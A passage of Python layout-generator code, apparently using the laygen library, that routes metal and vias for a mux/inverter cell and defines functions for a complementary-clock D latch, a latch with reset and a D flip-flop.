xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in2.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip2.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in5.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip5.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip6.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) # mux output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in2.name, refpinname0='S0', refinstname1=in5.name, refpinname1='S0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip2.name, refpinname0='S0', refinstname1=ip5.name, refpinname1='S0') rmuxo0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in5.name, refpinname0='S0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip5.name, refpinname1='S0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S1', gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='S0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='S0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # inverter input for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip9.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=in9.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in9.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") rinvi0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 4]), gridname0=rg_m2m3, refinstname0=in9.name, refpinname0='G0', refinstname1=in9.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=in9.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in9.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in9.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) rinvi0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in9.name, refpinname0='G0', refinstname1=in9.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in9.name, refpinname='G0', gridname=rg_m2m3) #inverter output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m2m3, refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m2m3, refinstname0=ip9.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip9.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in9.name, refpinname='D0', refinstindex=np.array([i, 1]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip9.name, refpinname='D0', refinstindex=np.array([i, 1]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in9.name, refpinname='D0', refinstindex=np.array([m-1, 1]), gridname=rg_m2m3) laygen.via(None, np.array([0, 1]), refinstname=ip9.name, refpinname='D0', refinstindex=np.array([m-1, 1]), gridname=rg_m2m3) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in9.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip9.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) # en/enb cross couple ren0_m2m3_xy = laygen.get_xy(obj = ren0_m2, gridname = rg_m2m3, sort=True) ren1_m2m3_xy = laygen.get_xy(obj = ren1_m2, gridname = rg_m2m3, sort=True) renb0_m2m3_xy = laygen.get_xy(obj = renb0_m2, gridname = rg_m2m3, sort=True) renb1_m2m3_xy = laygen.get_xy(obj = renb1_m2, gridname = rg_m2m3, sort=True) [rv0, rh0, renb0] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][2], renb0_m2m3_xy[1], ren1_m2m3_xy[0], renb0_m2m3_xy[0][1]+1, rg_m2m3) laygen.via(None, xy=np.array(renb0_m2m3_xy[1]), gridname=rg_m2m3) laygen.via(None, xy=np.array(ren1_m2m3_xy[0]), gridname=rg_m2m3) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=ren0_m2m3_xy[1], xy1=renb1_m2m3_xy[0], gridname0=rg_m2m3, via0=[[0, 0]], via1=[[0, 0]]) # muxout to invin rmuxo0_m2m3_xy = laygen.get_xy(obj = rmuxo0, gridname = rg_m2m3, sort=True) rinvi0_m2m3_xy = laygen.get_xy(obj = rinvi0, gridname = rg_m2m3, sort=True) laygen.route(None, laygen.layers['metal'][2], xy0=rmuxo0_m2m3_xy[1], xy1=rinvi0_m2m3_xy[1], gridname0=rg_m2m3, via1=[[0, 0]]) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in6.name, refinstindex0=np.array([i, 0]), refinstname1=in6.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip6.name, refinstindex0=np.array([i, 0]), refinstname1=ip6.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in9.name, refinstindex0=np.array([i, 0]), refinstname1=in9.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip9.name, refinstindex0=np.array([i, 0]), refinstname1=ip9.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in9.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip9.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in1.name, refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in6.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in6.name, refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip6.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip6.name, refinstindex1=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in9.name, refinstindex0=np.array([m - 1, 0]), refinstname1=in9.name, refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip9.name, refinstindex0=np.array([m - 1, 0]), refinstname1=ip9.name, refinstindex1=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in9.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip9.name, gridname=rg_m1m2, refinstindex=np.array([m - 1, 0])) # power and groud rail xy = laygen.get_xy(obj = in10.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip10.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in10.name) #pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I0', 'I1', 'EN0', 'EN1', 'O'], rect_list=[ri0, ri1, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_latch_2ck(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False): """generate D latch (complementary clock)""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin) #i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_1x_nmosinput", gridname = pg, refinstname = i0.name) #used minimum size #i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x_pmosinput", gridname = pg, refinstname = i1.name) i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_small_1x", gridname = pg, refinstname = i0.name) #used minimum size i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i1.name) # internal pins tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4) tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4) tinv0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) tinv1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4) tinv1_en_xy = laygen.get_inst_pin_xy(i1.name, 'EN', rg_m3m4) tinv1_enb_xy = laygen.get_inst_pin_xy(i1.name, 'ENB', rg_m3m4) tinv1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) inv0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4) inv0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) #clk rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=tinv0_en_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_enb_xy[0][0], pin_clk_y]), xy1=tinv1_enb_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_en_xy[0][0], pin_clk_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname=rg_m3m4) #clkb rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=tinv0_enb_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_en_xy[0][0], pin_clkb_y]), xy1=tinv1_en_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_enb_xy[0][0], pin_clkb_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname=rg_m3m4) #storage node laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=np.array([inv0_i_xy[0][0], route_mem_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=tinv0_o_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_o_xy[0][0], route_mem_y]), xy1=tinv1_o_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([inv0_i_xy[0][0], route_mem_y]), xy1=inv0_i_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_o_xy[0][0], route_mem_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_o_xy[0][0], route_mem_y]), gridname=rg_m3m4) laygen.via(None, np.array([inv0_i_xy[0][0], route_mem_y]), gridname=rg_m3m4) #inv0 output to tinv1 input ro0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=np.array([inv0_o_xy[0][0], pin_o_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=tinv1_i_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([inv0_o_xy[0][0], pin_o_y]), xy1=inv0_o_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv1_i_xy[0][0], pin_o_y]), gridname=rg_m3m4) laygen.via(None, np.array([inv0_o_xy[0][0], pin_o_y]), gridname=rg_m3m4) #pin if create_pin == True: ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4) laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_latch_2ck_rstbh(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,origin=np.array([0, 0]), m=4, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False): """generate D latch (complementary clock)""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I"+objectname_pfix + 'TINV0', "tinv_"+str(m)+"x", pg, xy=origin) i1 = laygen.relplace(name = "I"+objectname_pfix + 'TINV1', templatename = "tinv_small_1x", gridname = pg, refinstname = i0.name) #used minimum size i2 = laygen.relplace(name = "I"+objectname_pfix + 'ND0', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i1.name) # internal pins tinv0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) tinv0_en_xy = laygen.get_inst_pin_xy(i0.name, 'EN', rg_m3m4) tinv0_enb_xy = laygen.get_inst_pin_xy(i0.name, 'ENB', rg_m3m4) tinv0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) tinv1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4) tinv1_en_xy = laygen.get_inst_pin_xy(i1.name, 'EN', rg_m3m4) tinv1_enb_xy = laygen.get_inst_pin_xy(i1.name, 'ENB', rg_m3m4) tinv1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) nd0_a_xy = laygen.get_inst_pin_xy(i2.name, 'A', rg_m3m4) nd0_b_xy = laygen.get_inst_pin_xy(i2.name, 'B', rg_m3m4) nd0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4) #clk rclk0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_en_xy[0][0], pin_clk_y]), xy1=tinv0_en_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_enb_xy[0][0], pin_clk_y]), xy1=tinv1_enb_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_en_xy[0][0], pin_clk_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_enb_xy[0][0], pin_clk_y]), gridname=rg_m3m4) #clkb rclkb0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_enb_xy[0][0], pin_clkb_y]), xy1=tinv0_enb_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_en_xy[0][0], pin_clkb_y]), xy1=tinv1_en_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_enb_xy[0][0], pin_clkb_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_en_xy[0][0], pin_clkb_y]), gridname=rg_m3m4) #storage node laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=np.array([nd0_a_xy[0][0], route_mem_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv0_o_xy[0][0], route_mem_y]), xy1=tinv0_o_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_o_xy[0][0], route_mem_y]), xy1=tinv1_o_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([nd0_a_xy[0][0], route_mem_y]), xy1=nd0_a_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv0_o_xy[0][0], route_mem_y]), gridname=rg_m3m4) laygen.via(None, np.array([tinv1_o_xy[0][0], route_mem_y]), gridname=rg_m3m4) laygen.via(None, np.array([nd0_a_xy[0][0], route_mem_y]), gridname=rg_m3m4) #nd0 output to tinv1 input ro0=laygen.route(None, laygen.layers['metal'][4], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=np.array([nd0_o_xy[0][0], pin_o_y]), gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([tinv1_i_xy[0][0], pin_o_y]), xy1=tinv1_i_xy[0], gridname0=rg_m3m4) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([nd0_o_xy[0][0], pin_o_y]), xy1=nd0_o_xy[0], gridname0=rg_m3m4) laygen.via(None, np.array([tinv1_i_xy[0][0], pin_o_y]), gridname=rg_m3m4) laygen.via(None, np.array([nd0_o_xy[0][0], pin_o_y]), gridname=rg_m3m4) #pin if create_pin == True: ri0_pin_xy=laygen.get_inst_pin_xy(name="I" + objectname_pfix + 'TINV0', pinname='I', gridname=rg_m3m4) laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ri0_pin_xy, gridname=rg_m3m4) laygen.pin(name='CLK', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclk0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = rclkb0, gridname = rg_m3m4), gridname=rg_m3m4) laygen.pin(name='RSTB', layer=laygen.layers['pin'][3], xy=nd0_b_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=laygen.get_xy(obj = ro0, gridname = rg_m3m4), gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VDD', rg_m2m3) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3) rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'TINV0', 'VSS', rg_m2m3) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) def generate_dff(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=np.array([0, 0]), m=4, create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m3m4 = routing_grid_m3m4 # placement i0 = laygen.place("I" + objectname_pfix + 'INV0', "inv_" + str(m) + "x", pg, xy=origin) i1 = laygen.relplace(name = "I" + objectname_pfix + 'INV1', templatename = "inv_" + str(m) + "x", gridname = pg, refinstname = i0.name) org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'INV1'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck(laygen, objectname_pfix+'LCH0', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=3, pin_clkb_y=2, route_mem_y=4, pin_o_y=5, create_pin=False) org=origin+laygen.get_xy(obj =laygen.get_inst(name = 'I'+objectname_pfix+'LCH0INV0'), gridname = pg)+ laygen.get_xy(obj = i1.template, gridname = pg) * np.array([1, 0]) generate_latch_2ck(laygen, objectname_pfix+'LCH1', placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, origin=org, m=m, pin_clk_y=2, pin_clkb_y=3, route_mem_y=4, pin_o_y=5, create_pin=False) #internal coordinates i0_i_xy = laygen.get_inst_pin_xy(i0.name, 'I', rg_m3m4) i0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4) i1_i_xy = laygen.get_inst_pin_xy(i1.name, 'I', rg_m3m4) i1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4) ilch0_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0TINV0', 'I', rg_m3m4) ilch0_o_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH0INV0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1TINV0', 'ENB', rg_m3m4) ilch1_o_xy = laygen.get_inst_pin_xy('I'+objectname_pfix+'LCH1INV0', 'O', rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], 